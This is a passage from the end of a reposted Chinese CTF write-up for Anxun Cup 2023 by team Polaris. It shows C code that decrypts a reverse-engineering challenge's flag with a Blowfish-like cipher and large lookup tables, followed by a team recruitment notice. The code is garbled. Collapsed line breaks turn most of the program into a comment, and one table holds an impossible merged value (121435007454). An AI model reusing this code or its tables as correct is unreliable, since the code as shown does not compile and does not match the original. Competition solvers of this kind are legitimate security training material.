835001229, 356110831, 1862373254,4053415012, 924842823, 1325083506, 2566709663, 476044749, 862582026, 403946608, 981948886,95040438, 2896276803, 1660022945, 4205568328, 3074709622, 3526601780, 1968748706, 3098387267,1212705143, 1764694666, 192896265, 2191766229, 1432204716, 1288310487, 380336587, 2713303837,1410063421, 79079056, 1138884246, 1300812639, 2241915529, 983867098, 1692596682, 3376239816,3909096113, 671223618, 1578759049, 2882967937, 1013691809, 2770998440, 15399867, 796952286,2381001978, 118957219, 349371860, 3509336758, 3550298454, 3983933129, 2431510086, 2754122191,609900711, 3886727998, 880847986, 213232128, 910454213, 2459776557, 1942498188, 1669211226,385448568, 2281522429, 2353434491, 4257643385, 3195978567, 2430535998, 4199278647, 2220852705,4036574498, 2262945714, 4170187289, 776412985, 4124210120, 239033054, 3968939686, 1929753233,173853027, 1406407725, 3941693692, 796725757, 3144650892, 3503708025, 2776022674, 1938751635,1248847972, 2608994359, 851921828, 1516411021, 1683816190, 2338696425, 3757199265, 178571885,4028236048, 3667081067, 2717910895, 2244146045, 1642947711, 1423780774, 749248876, 4272358479,3180443602, 3289651094, 2591430980, 896035799, 1914818214, 2664938025, 3540626352, 3906500822,3857870005, 3462588037, 572636384, 1418195159, 3684107302, 3709260110, 3222399255, 1412646536,3413802766, 2772059040, 2783378183, 1330820273, 1282668134, 32527697, 3701229580, 1986560844,349120310, 2382511834, 2292698503, 2173225989, 4285986350, 1130513268, 3346150625, 2259836169,3929769216, 3647181410, 1519130162, 87748607, 2733551963, 2709923326, 403631292, 1765618983,2108202029, 3319220774, 208422213, 2533405018, 130602663, 2992361376, 3203909780, 2954253679,2833769228, 1196155445, 2624905029, 58158346, 406029448, 1075869660, 1062768470, 646174447,246825350, 3323108458, 2087338216, 329356675, 486795463, 857075742, 1310319795, 1425704113,1133084413, 2813304446, 2116197744, 789924438, 4278930869, 638107207, 3678293965, 2092667206,89794413, 2338500461, 2891216521, 4093119634, 715895208, 832322804, 1353661512, 3477813964,512982170, 1516778567, 238161820, 2538910274, 1298642056, 1961458426, 906844823, 1435007454,3082866898, 3889652977, 133149898, 3646853904, 2444699146, 1038682641, 2690761423, 2348092183,3918791193, 3967085231, 2271756042, 4262278839, 2584709943, 3014727665, 513192404, 3279689267,3807058297, 3251022180, 582131098, 1234331602, 3691068172, 3961315345, 2342571110, 3297560873,1051581287, 23277464, 1948450009, 3124254968, 3565802147, 1930404567, 3282282787, 2226197055,3413978209, 2461586429, 3148013157, 425596849, 3680505353, 3228740810, 2311485154, 363598425,853879466, 3570971279, 1459843144, 3414962580, 2853247141, 1419118134, 3318660049, 2832031686,505000282, 3283805587, 3838471692, 1063029572, 3505139932, 2522219181, 216313596, 4116288738,2639721842, 3107550641, 220289618, 3970170052, 2804922372, 1554498005, 3953620235, 1724968977,2482737094, 3307754745, 2588408380, 315900071, 3320870247, 3052124838, 3429188486, 100864008,3133659962, 694581523, 3839618974, 19304293, 2467286314, 3229326167, 2305058656, 425245302,1460822187, 3479947371, 1775425452, 2748315998, 2809396963, 2903577382, 2879049479, 3335132732,2984379717, 828009529, 399374814, 3327048549, 1193843085, 4266483639, 1929458055, 3348829559,3257744350, 1193522928, 3573988769, 3473247351, 2122441385, 1034745120, 3638607549, 2280534042,441318120, 1611805658, 183435220, 1894620779, 187018605, 3804410878, 2181248765, 3489213213,304389047, 1031726894, 713289271, 2493008349, 3135758367, 70816160, 5376726, 1155600499,2296039829, 1231182590, 3819326726, 1294936807, 376644566, 1191222656, 3369224278, 2735641838,2344901511, 97781287, 2802518024, 2772748251, 1918306957, 2849480005, 1354956038, 659872705,3085158128, 3145559048, 1414595956, 3475240780, 3139219739, 2259098988, 4266094556, 217675350,1179367358, 3697328045, 2782967266, 3352559254, 1960696074, 3686944166, 1895840813, 304048976,1343378469, 2719183224, 2453142435, 2098196276, 2748180570, 2474317353, 3582692056, 1541844022,4250380399, 2322441973, 971352176, 2882404465, 4202231056, 3056881346, 2879145718, 3282630858,2586773008, 3403124075 };uint32_t ans[72] = { 2349853232, 683184685, 2245047130, 3954499188, 2775460568, 2026269219,474509143, 2953044360, 912170758, 1801531562, 3887048238, 401602842, 3227670935, 2936374891,4215643595, 984249622, 394855348, 3516186580 };uint32_t sub_452304(uint32_t a2){uint32_t a= ans1[(3072 + 4 * (a2 & 0xff)) / 4] + (ans1[(2048 + 4 * ((a2 >> 8) & 0xff)) / 4]^ (ans1[(1024 + 4 * ((a2 >> 16) & 0xff)) / 4] + ans1[(4 * ((a2 >> 24) & 0xff)) / 4]));return a;}void decrypt(uint32_t* temp){temp[0] ^= ans[64 / 4];temp[1] ^= ans[68 / 4];for (int i = 7; i >= 0; i--){temp[0] ^= sub_452304(temp[1]);temp[1] ^= ans[(8 * i + 4) / 4];temp[1] ^= sub_452304(temp[0]);temp[0] ^= ans[(8 * i) / 4];}}int main(){//uint32_t ans[72] = {2349853232, 683184685, 2245047130, 3954499188, 2775460568, 2026269219,474509143, 2953044360, 912170758, 1801531562, 3887048238, 401602842, 3227670935, 2936374891,4215643595, 984249622, 394855348, 3516186580};uint32_t encode[4] = { 0x9550e250,0x11a51f04,0xf1632b47,0x8f17e16c};// uint32_t ans1[1024] = {3612299254, 909017393, 3176992461, 3316901652, 2609835858,2796138362, 3652223468, 4026124070, 4005344247, 3018204662, 3971881576, 1883703289, 3380028605,2310268358, 3192089339, 3865334851, 991473981, 4261573226, 3513563506, 3274279743, 4056254897,393233045, 3857783913, 3209970495, 3545254565, 1726489627, 2617077090, 536406376, 2185599772,810099132, 3109160618, 2098277993, 592628296, 3835560518, 1236356276, 2806853253, 3386832562,2875662589, 1716755816, 1338756477, 135048504, 3661026591, 985113045, 3225175390, 3059325024,947849520, 1317660494, 437204192, 2901243097, 3844245920, 120516819, 3690592916, 1742621374,961341586, 82579909, 2602161357, 688080856, 1834854888, 1205398077, 1803263324, 3278861203,1118662528, 2233320600, 1503686121, 3021908902, 169435313, 4132028466, 3591033800, 604594897,1387163463, 3610184282, 82732284, 3734169552, 26558337, 3263666052, 1675780680, 1245030056,4023753971, 3106900708, 1161959714, 1921670186, 2139379863, 3111216585, 144875354, 3891556883,2915976098, 1543965061, 3180167923, 2907634212, 706636810, 2809431891, 3339771535, 3003842848,666170416, 2214373859, 3719315293, 1191578267, 2426783095, 3079199401, 1830926746, 3204220640,3731036918, 1660271787, 492612286, 2570398579, 3227925737, 3774103751, 1359649358, 3445737257,2401180843, 1760303728, 3485791200, 472932926, 3753885968, 4161071017, 2648262891, 262921962,2374085492, 2248303185, 390396083, 2712543590, 2161070294, 174295997, 3158425513, 940358329,1878094520, 3005772882, 3959545626, 2147432275, 938305420, 1663595663, 235114013, 165426881,1434286583, 397714971, 3286531863, 3890683405, 2503783237, 3156100839, 1862835550, 2877364194,2360580686, 2946284660, 1773107797, 1704357043, 970020583, 3671336424, 2997981521, 2379920259,4265442517, 925584979, 2425516426, 2121507294, 3583831078, 950172452, 3859984899, 2852403993,2834441141, 3757363531, 239582191, 1408912961, 3290831151, 810650838, 151049394, 3826060979,7664562, 1203440678, 756917008, 1270613790, 1462665932, 3976216079, 2201884704, 1198888899,1862145384, 1842954329, 3254547884, 3352184565, 1559929120, 2732851026, 3472229415, 3324261065,1912193298, 1520363419, 1013564590, 2466244710, 3515836733, 3290010742, 1475359871, 2469026558,265453838, 3764144433, 1951032479, 1789095261, 882704806, 2080169719, 1355828509, 216692911,2077881151, 2179175345, 658329417, 2639415873, 1608429810, 2328829540, 3922963539, 3590750574,3005810895, 3054927960, 3145751839, 2438530629, 3178227540, 2656268540, 2918949977, 2025459779,702388526, 352396826, 2845512848, 3136351238, 582022810, 942471529, 2425653069, 4060440851,1489288468, 2812878567, 1690137298, 3825703696, 2033813973, 2840178772, 3205759263, 3158390194,4194323040, 2773043817, 633123956, 78997677, 3806715992, 157202888, 2479881715, 3347034983,4027390473, 676130488, 559181126, 1893767750, 3132813806, 1737160727, 3039073421, 1904851998,2726372549, 1482038449, 1772371038, 1399137205, 502080223, 1158624194, 1959469547, 2125030951,1146241092, 136874116, 3312727756, 3123845189, 1616952983, 1116822306, 1447890576, 798589893,2759565721, 2635262896, 267525495, 969441731, 3528824463, 2723329496, 3988026719, 3069802268,3904044072, 1247175377, 3018910654, 1144761192, 1693003556, 653667911, 1322824793, 2685461955,3423544340, 3895206564, 1263613072, 484014289, 4002680300, 82525547, 3713365205, 2785407392,3203680529, 568074554, 2948600661, 690536872, 3761766135, 4093211731, 3026577007, 3623968899,3114714815, 1660107032, 1630017735, 4015244569, 795121368, 181611949, 2302983550, 299228304,1035595335, 4107946561, 4248631138, 759316079, 3455675297, 1802306174, 1248446376, 2220813029,1106431524, 2974149249, 913000283, 1101868625, 1963166077, 1204015669, 2936566510, 1849439059,1188145533, 1970281242, 3473902661, 3605729351, 779644256, 317399433, 2294142642, 3187988184,3234556957, 2451570191, 539845509, 4051034255, 4207789360, 918997589, 4024179045, 47092157,3461478898, 219928750, 3174028876, 3798490823, 4236068923, 1733771380, 2213684509, 3418631303,1791707244, 2954339021, 604474946, 715741480, 1538117713, 2018946469, 3133692790, 2057135452,4081014361, 1737711834, 443814679, 3951854071, 1261695230, 3484936769, 811019382, 3431304140,2125583415, 3242734973, 4068818582, 1140887881, 2754994089, 1849203727, 2776434143, 4101627524,1104008366, 3343386008, 1690010785, 1589833538, 2830854046, 3005511388, 1327586722, 3365805672,2894519128, 377014138, 3258751486, 682576491, 1144946337, 2527160065, 1145337453, 1543577757,1661179461, 716027965, 2345828765, 3765457141, 3719354469, 3575166803, 674417138, 2258687374,4034399391, 3447359359, 4155138269, 2155299098, 1682039011, 3063342633, 97543685, 3653422538,2954039847, 2269743455, 2661523390, 436334478, 1525296779, 1449357693, 4202155545, 1935437360,3296147951, 2570170770, 1361243263, 2810328459, 3126080089, 3862996957, 1501245806, 146428735,1286347126, 1666807071, 2983557661, 3352824585, 2918359338, 1936219053, 3034276746, 4001013798,2185013997, 1018960196, 505963722, 560767059, 602988785, 800926720, 4165486503, 85828300,3227976635, 649010145, 1125597870, 966697127, 167433808, 874570896, 3458750878, 3395258985,252088262, 4222815752, 2639595847, 823198564, 486454327, 833313397, 205508261, 2786404808,2510035198, 733713357, 1354849271, 3215264880, 1669427806, 1452787206, 3301133258, 3020307851,2543834212, 1483052027, 2983195960, 3960532648, 3326718810, 1483969807, 1747416431, 1426364238,1473516291, 3546046313, 376764897, 1169008197, 4294111582, 1594224422, 2284959488, 896177674,204425518, 2774265376, 3033824452, 2439216892, 4053408298, 1693000377, 2609129969, 3032619608,308898488, 3702536945, 977921220, 2735144083, 670850509, 2980849390, 1060995153, 1355919448,1635397140, 4088809980, 1420233277, 663910423, 2710634922, 383964395, 4181644457, 2052912767,3955690015, 645774729, 3320447412, 525766475, 3072324203, 2984772920, 608845350, 1847968149,1506522579, 1499948296, 1132257855, 3799040339, 2104379384, 1857522470, 4264354361, 13542311,4105907176, 916156479, 3593386610, 2662026461, 1622743063, 105136493, 2412473138, 4064549266,3123460414, 3921011079, 718464174, 278010642, 2894547666, 1832841070, 3833519489, 2789630359,3932469301, 314230278, 843881168, 1591227520, 2173809348, 1802556348, 3426041307, 3571278871,130404080, 582313559, 1068143687, 3081884854, 85711274, 3891579692, 2539344878, 1011763299,266906039, 355962384, 3286276118, 862412479, 2027782370, 3255596042, 607628161, 1009421605,2722485621, 4288910093, 475523691, 1238990637, 3029919481, 1227651643, 457015533, 453798348,4137614187, 286748010, 2948221670, 147673401, 2618102637, 1554248227, 67648155, 1534379566,4269591083, 2170536445, 2387217625, 3192685544, 3879696649, 3276561223, 450492746, 4040053455,893402262, 110762684, 454018881, 3993940863, 2619682979, 2392445782, 1975308775, 2633142153,1099704695, 3660468837, 1356389045, 4235162877, 3156792154, 2167871338, 1325276422, 477945007,1015766725, 312791145, 1919976644, 2536378684, 3553880401, 1245281630, 1723424489, 4242078577,127882815, 2076642282, 2897062914, 3422554873, 2511825743, 3279714577, 676398387, 2477683067,2690393167, 1557866509, 2377366658, 1833176462, 1867241793, 1728770188, 2030196186, 487071513,2557723795, 126875659, 3310563015, 832818887, 1279107586, 1189176266, 402509529, 3673978930,3562678424, 1101937332, 1433686036, 2828533185, 2344180009, 2360208424, 2067254040, 2605496877,2633778875, 1374180181, 958478401, 3769939655, 3095119178, 3404498833, 3498729428, 2919725926,3899615018, 1622936878, 1714950277, 1416079787, 1028838279, 2370886484, 1179276667, 3630483254,2211301498, 3110750966, 3842377908, 2062040230, 616149483, 51223745, 661298142, 1348065750,3529860603, 2758213304, 193574778, 1229799653, 3471014957, 865196813, 2981594497, 3144691620,45598418, 1428776199, 2981650001, 886009176, 1673674753, 2482633515, 835001229, 356110831,1862373254, 4053415012, 924842823, 1325083506, 2566709663, 476044749, 862582026, 403946608,981948886, 95040438, 2896276803, 1660022945, 4205568328, 3074709622, 3526601780, 1968748706,3098387267, 1212705143, 1764694666, 192896265, 2191766229, 1432204716, 1288310487, 380336587,2713303837, 1410063421, 79079056, 1138884246, 1300812639, 2241915529, 983867098, 1692596682,3376239816, 3909096113, 671223618, 1578759049, 2882967937, 1013691809, 2770998440, 15399867,796952286, 2381001978, 118957219, 349371860, 3509336758, 3550298454, 3983933129, 2431510086,2754122191, 609900711, 3886727998, 880847986, 213232128, 910454213, 2459776557, 1942498188,1669211226, 385448568, 2281522429, 2353434491, 4257643385, 3195978567, 2430535998, 4199278647,2220852705, 4036574498, 2262945714, 4170187289, 776412985, 4124210120, 239033054, 3968939686,1929753233, 173853027, 1406407725, 3941693692, 796725757, 3144650892, 3503708025, 2776022674,1938751635, 1248847972, 2608994359, 851921828, 1516411021, 1683816190, 2338696425, 3757199265,178571885, 4028236048, 3667081067, 2717910895, 2244146045, 1642947711, 1423780774, 749248876,4272358479, 3180443602, 3289651094, 2591430980, 896035799, 1914818214, 2664938025, 3540626352,3906500822, 3857870005, 3462588037, 572636384, 1418195159, 3684107302, 3709260110, 3222399255,1412646536, 3413802766, 2772059040, 2783378183, 1330820273, 121435007454, 3082866898, 3889652977, 133149898, 3646853904, 2444699146, 1038682641, 2690761423,2348092183, 3918791193, 3967085231, 2271756042, 4262278839, 2584709943, 3014727665, 513192404,3279689267, 3807058297, 3251022180, 582131098, 1234331602, 3691068172, 3961315345, 2342571110,3297560873, 1051581287, 23277464, 1948450009, 3124254968, 3565802147, 1930404567, 3282282787,2226197055, 3413978209, 2461586429, 3148013157, 425596849, 3680505353, 3228740810, 2311485154,363598425, 853879466, 3570971279, 1459843144, 3414962580, 2853247141, 1419118134, 3318660049,2832031686, 505000282, 3283805587, 3838471692, 1063029572, 3505139932, 2522219181, 216313596,4116288738, 2639721842, 3107550641, 220289618, 3970170052, 2804922372, 1554498005, 3953620235,1724968977, 2482737094, 3307754745, 2588408380, 315900071, 3320870247, 3052124838, 3429188486,100864008, 3133659962, 694581523, 3839618974, 19304293, 2467286314, 3229326167, 2305058656,425245302, 1460822187, 3479947371, 1775425452, 2748315998, 2809396963, 2903577382, 2879049479,3335132732, 2984379717, 828009529, 399374814, 3327048549, 1193843085, 4266483639, 1929458055,3348829559, 3257744350, 1193522928, 3573988769, 3473247351, 2122441385, 1034745120, 3638607549,2280534042, 441318120, 1611805658, 183435220, 1894620779, 187018605, 3804410878, 2181248765,3489213213, 304389047, 1031726894, 713289271, 2493008349, 3135758367, 70816160, 5376726,1155600499, 2296039829, 1231182590, 3819326726, 1294936807, 376644566, 1191222656, 3369224278,2735641838, 2344901511, 97781287, 2802518024, 2772748251, 1918306957, 2849480005, 1354956038,659872705, 3085158128, 3145559048, 1414595956, 3475240780, 3139219739, 2259098988, 4266094556,217675350, 1179367358, 3697328045, 2782967266, 3352559254, 1960696074, 3686944166, 1895840813,304048976, 1343378469, 2719183224, 2453142435, 2098196276, 2748180570, 2474317353, 3582692056,1541844022, 4250380399, 2322441973, 971352176, 2882404465, 4202231056, 3056881346, 2879145718,3282630858, 2586773008, 3403124075};uint32_t temp[2] = { 0 };for (int i = 0; i < 4; i += 2){temp[0] = encode[i];temp[1] = encode[i + 1];decrypt(temp);printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 3), *((char*)&temp[0] + 2), *((char*)&temp[0] + 1), *((char*)&temp[0] + 0), *((char*)&temp[1] + 3), *((char*)&temp[1] + 2), *((char*)&temp[1] + 1), *((char*)&temp[1] + 0));}}

文末:

欢迎师傅们加入我们:

星盟安全团队纳新群1:222328705

星盟安全团队纳新群2:346014666

有兴趣的师傅欢迎一起来讨论!

安洵杯2023-WP --Polaris

原文始发于微信公众号(星盟安全):安洵杯2023-WP –Polaris

版权声明:admin 发表于 2024年1月16日 下午4:58。
转载请注明:安洵杯2023-WP –Polaris | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...